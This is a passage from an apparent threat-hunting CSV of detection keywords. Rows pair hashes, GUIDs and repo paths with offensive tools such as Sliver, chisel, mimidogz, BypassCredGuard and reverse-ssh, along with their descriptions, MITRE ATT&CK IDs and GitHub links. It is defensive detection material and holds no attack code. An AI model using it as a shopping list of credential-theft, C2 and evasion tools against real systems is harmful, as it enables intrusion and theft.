"*f0e1e5a2b52773889dc1e7c44c5a80716a0dd98beee46b705748773e292e1d88*",".{0,1000}f0e1e5a2b52773889dc1e7c44c5a80716a0dd98beee46b705748773e292e1d88.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","N/A","10","10","1664","407","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z" 
"*f140d5c67e7a151d9bba6d8c456dd44004f14056acd3257aa2203b30e959ef39*",".{0,1000}f140d5c67e7a151d9bba6d8c456dd44004f14056acd3257aa2203b30e959ef39.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*F1527C49-CA1F-4994-BB9D-E20DD2C607FD*",".{0,1000}F1527C49\-CA1F\-4994\-BB9D\-E20DD2C607FD.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","N/A","10","3","293","47","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" "*F1527C49-CA1F-4994-BB9D-E20DD2C607FD*",".{0,1000}F1527C49\-CA1F\-4994\-BB9D\-E20DD2C607FD.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","N/A","10","3","293","47","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" "*f15785e3f3b824872a6b9dd8c550886179d3e636f0f1939d2b45c411701c72f8*",".{0,1000}f15785e3f3b824872a6b9dd8c550886179d3e636f0f1939d2b45c411701c72f8.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - 
T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*f15f6182ca98bb702c2578efc0aef6e35d8237b89a00a588364bb7e068b132fa*",".{0,1000}f15f6182ca98bb702c2578efc0aef6e35d8237b89a00a588364bb7e068b132fa.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","N/A","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","N/A","10","6","598","132","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z" "*F1653F20-D47D-4F29-8C55-3C835542AF5F*",".{0,1000}F1653F20\-D47D\-4F29\-8C55\-3C835542AF5F.{0,1000}","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/djhohnstein/SharpChromium","1","1","N/A","10","7","651","99","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z" "*f187ab7396fc3a96e9549316af3e8eaf9ecdca41adec82d98ca52e67974811a8*",".{0,1000}f187ab7396fc3a96e9549316af3e8eaf9ecdca41adec82d98ca52e67974811a8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*f19bd04ee2c9271e758bc21fc681f0a08ebf441a70b3221ccf5d201d5ae70f9b*",".{0,1000}f19bd04ee2c9271e758bc21fc681f0a08ebf441a70b3221ccf5d201d5ae70f9b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*f1a21c50b4c315780c16c0777f84b5fa407a98acc014cf68ff05e3c007ce2f0c*",".{0,1000}f1a21c50b4c315780c16c0777f84b5fa407a98acc014cf68ff05e3c007ce2f0c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*f1bdbea3a5f869e83b52e6284e24d76049a3505492a8b7176cb07f2ad03cbe2b*",".{0,1000}f1bdbea3a5f869e83b52e6284e24d76049a3505492a8b7176cb07f2ad03cbe2b.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. 
On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","0","https://www.rythmstick.net/posts/amsitrigger/","10","10","N/A","N/A","N/A","N/A" "*f1c6a2f008eb7888b5b081a834088a4a1b6fd688db3c99c89541d673489ae130*",".{0,1000}f1c6a2f008eb7888b5b081a834088a4a1b6fd688db3c99c89541d673489ae130.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*F1DF1D0F-FF86-4106-97A8-F95AAF525C54*",".{0,1000}F1DF1D0F\-FF86\-4106\-97A8\-F95AAF525C54.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","10","958","453","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" "*F1E836C1-2279-49B3-84CC-ED8B048FCC44*",".{0,1000}F1E836C1\-2279\-49B3\-84CC\-ED8B048FCC44.{0,1000}","offensive_tool_keyword","WDBypass","Disable Windows Defender (+ UAC Bypass, + Upgrade to SYSTEM)","T1089 - T1562.001 - T1548.002","TA0005 - TA0040 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://bitbucket.org/evilgreyswork/wd-uac/downloads/","1","0","https://blog.injectexp.dev/2024/02/28/disable-windows-defender-uac-bypass-upgrade-to-system/","10","10","N/A","N/A","N/A","N/A" "*f1zm0/acheron*",".{0,1000}f1zm0\/acheron.{0,1000}","offensive_tool_keyword","acheron","indirect 
syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","3","286","33","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z" "*f1zm0/hades*",".{0,1000}f1zm0\/hades.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","1","N/A","N/A","4","318","45","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" "*f205814e44353d23a5cef0e3cbfb37cc8ec4bfad9def53384d671dcc043c00ee*",".{0,1000}f205814e44353d23a5cef0e3cbfb37cc8ec4bfad9def53384d671dcc043c00ee.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*f2179c77b91b691efbf523410bdd70aa97c9a6866d5d13004a8ff559243f18e0*",".{0,1000}f2179c77b91b691efbf523410bdd70aa97c9a6866d5d13004a8ff559243f18e0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*F233D36D-B64A-4F14-A9F9-B8557C2D4F5D*",".{0,1000}F233D36D\-B64A\-4F14\-A9F9\-B8557C2D4F5D.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*f236aee384d7a0fab7fc186454ee6adb83b756843ecf75ec14b3df826a66ff1d*",".{0,1000}f236aee384d7a0fab7fc186454ee6adb83b756843ecf75ec14b3df826a66ff1d.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","N/A","9","2","166","47","2022-09-02T08:43:14Z","2018-07-14T18:48:51Z" "*F2378C48-D441-49E7-B094-1E8642A7E7C0*",".{0,1000}F2378C48\-D441\-49E7\-B094\-1E8642A7E7C0.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*f27479a8728d9126cc055daeb5cddd01cabfa37d*",".{0,1000}f27479a8728d9126cc055daeb5cddd01cabfa37d.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and 
Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*f2754719c9b797be118057367989dc2da30a55d3f17260b55d252efdf7967579*",".{0,1000}f2754719c9b797be118057367989dc2da30a55d3f17260b55d252efdf7967579.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*f2a64b4fce0d07eafded5c2125d7d80b*",".{0,1000}f2a64b4fce0d07eafded5c2125d7d80b.{0,1000}","offensive_tool_keyword","iodine","iodine. 
iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*f2c1234d05744b49749b6ef743d7a71a45d96400ec1b510531032de8312a377d*",".{0,1000}f2c1234d05744b49749b6ef743d7a71a45d96400ec1b510531032de8312a377d.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","0","file_hash","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*f2d93a4d4188a53285c334699b010750786a607162a498f2ff2a93d823cbf0fc*",".{0,1000}f2d93a4d4188a53285c334699b010750786a607162a498f2ff2a93d823cbf0fc.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*f2e4dc0f2862a37449a85eaa39fe3a7840822e7ae24e8999fb6401b084c9505a*",".{0,1000}f2e4dc0f2862a37449a85eaa39fe3a7840822e7ae24e8999fb6401b084c9505a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*f2ea2ded9b06880391d161ba3763f120209c6e2831e2c0092733df29e96a59a5*",".{0,1000}f2ea2ded9b06880391d161ba3763f120209c6e2831e2c0092733df29e96a59a5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*f2ee8facc06d5525d4bb73e079e8b599a0a2893351193013ba45ca311dbac50e*",".{0,1000}f2ee8facc06d5525d4bb73e079e8b599a0a2893351193013ba45ca311dbac50e.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","N/A","Credential Access","https://github.com/projectb-temp/mimidogz","1","0","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z" 
"*f2f1df5e2cb5f824bea4b8e5b936187293b9717268aec16ab4eaa8c3f35e16cb*",".{0,1000}f2f1df5e2cb5f824bea4b8e5b936187293b9717268aec16ab4eaa8c3f35e16cb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*f336ca7eed8b8f05f14090f23c4cc1a67f9b7e58b61586adf5c72542b05b94be*",".{0,1000}f336ca7eed8b8f05f14090f23c4cc1a67f9b7e58b61586adf5c72542b05b94be.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*f34bd1d485de437fe18360d1e850c3fd64415e49d691e610711d8d232071a0b1*",".{0,1000}f34bd1d485de437fe18360d1e850c3fd64415e49d691e610711d8d232071a0b1.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*f3a97e2966c9b63bf0ce88346b568687f4253557841fd9c8acdee8ad25b27a97*",".{0,1000}f3a97e2966c9b63bf0ce88346b568687f4253557841fd9c8acdee8ad25b27a97.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*f3b5e0f54f1da134c5d3c135f5be8ae7e85e499e8e73fabf87ffe010c23749ef*",".{0,1000}f3b5e0f54f1da134c5d3c135f5be8ae7e85e499e8e73fabf87ffe010c23749ef.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "*F3C62326-E221-4481-AC57-EF7F76AAF27B*",".{0,1000}F3C62326\-E221\-4481\-AC57\-EF7F76AAF27B.{0,1000}","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","0","N/A","10","10","122","34","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z" "*f3e108c7993b8d46c832ac2499a97395cc18fc9c4c1656acc25c969c7090ffcd*",".{0,1000}f3e108c7993b8d46c832ac2499a97395cc18fc9c4c1656acc25c969c7090ffcd.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" 
"*f401f7bdae8094f273ab86529a90d93a192fed69897b908d1f5cc94f625b6b88*",".{0,1000}f401f7bdae8094f273ab86529a90d93a192fed69897b908d1f5cc94f625b6b88.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*f4081a8e30f75d46.js*",".{0,1000}f4081a8e30f75d46\.js.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*f4309ce07f27a76e253734d7b4b99159aad92445dd653b5dd96e3e76c9905588*",".{0,1000}f4309ce07f27a76e253734d7b4b99159aad92445dd653b5dd96e3e76c9905588.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" 
"*f44103b0e97b84c0381f234744a0a2aa2bf79cc884ee9526dbab8f9d674bc17b*",".{0,1000}f44103b0e97b84c0381f234744a0a2aa2bf79cc884ee9526dbab8f9d674bc17b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*f44bdc821e6588197e6d1b868a60aa140f20971a6eaeeb9e2a52bdb4065b7fd7*",".{0,1000}f44bdc821e6588197e6d1b868a60aa140f20971a6eaeeb9e2a52bdb4065b7fd7.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*f47ae40fa2ba9ad689d59f8b755ea68e116c3dd603d6f985a7eff273ce0f381b*",".{0,1000}f47ae40fa2ba9ad689d59f8b755ea68e116c3dd603d6f985a7eff273ce0f381b.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004?","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","9","1","92","12","2024-04-17T14:03:13Z","2024-04-17T13:00:12Z" "*f4b50c86fa7368506ce70412d54b64ec45d4d93b6f0740b607c23a1a149eea46*",".{0,1000}f4b50c86fa7368506ce70412d54b64ec45d4d93b6f0740b607c23a1a149eea46.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly 
builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*f4c56a0ddc1228394dd2a4dd30746644af6a25e5071cb28db71cb1c8c248bef6*",".{0,1000}f4c56a0ddc1228394dd2a4dd30746644af6a25e5071cb28db71cb1c8c248bef6.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*f4ea99dc41cb7922d01955eef9303ec3a24b88c3318138855346de1e830ed09e*",".{0,1000}f4ea99dc41cb7922d01955eef9303ec3a24b88c3318138855346de1e830ed09e.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*f4ec39cac50227d36423f1384a7144fa4faee9d29879ec5305259a676f46b290*",".{0,1000}f4ec39cac50227d36423f1384a7144fa4faee9d29879ec5305259a676f46b290.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 
- TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*f4f736012e96fda525525508fdfb99ddd93d1e114b1a3b616234f6c47ffb84c9*",".{0,1000}f4f736012e96fda525525508fdfb99ddd93d1e114b1a3b616234f6c47ffb84c9.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*f4fc8dabe2ba48d9d204dd0f74cae65a1eb27951664911aa116ab08446c1fb1d*",".{0,1000}f4fc8dabe2ba48d9d204dd0f74cae65a1eb27951664911aa116ab08446c1fb1d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 